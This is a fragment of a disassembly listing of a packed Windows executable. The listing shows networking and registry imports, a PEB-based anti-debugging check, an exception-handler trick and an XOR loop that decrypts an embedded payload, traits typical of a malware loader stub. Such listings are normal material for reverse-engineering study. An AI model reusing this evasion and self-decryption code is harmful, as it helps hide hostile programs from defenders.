dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 74610000h
dd 696Fh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
pop ebx
call loc_3100925F
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:3100920F�j
jmp short near ptr loc_3100920A+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3100925E
call $+5
pop ebp
sub ebp, 402320h
mov eax, [ebp+402367h]
add eax, [ebp+40236Fh]
mov esi, eax
mov eax, [ebp+40236Bh]
add eax, [ebp+40236Fh]
push eax
mov edi, esi
xor ecx, ecx
loc_3100924D: ; CODE XREF: UPX2:3100925C�j
lodsb
xor al, [ebp+402377h]
stosb
inc ecx
cmp ecx, [ebp+402373h]
jl short loc_3100924D
locret_3100925E: ; CODE XREF: UPX2:31009220�j
retn
; ---------------------------------------------------------------------------
loc_3100925F: ; CODE XREF: UPX2:31009201�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], ah
add [eax], ah
add byte ptr [eax], 0
; ---------------------------------------------------------------------------
dw 0
dd 24003100h, 100000h, 760h dup(0)
UPX2 ends
; Section 4. (virtual address 0000B000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3100B000h
align 2000h
_idata2 ends
end start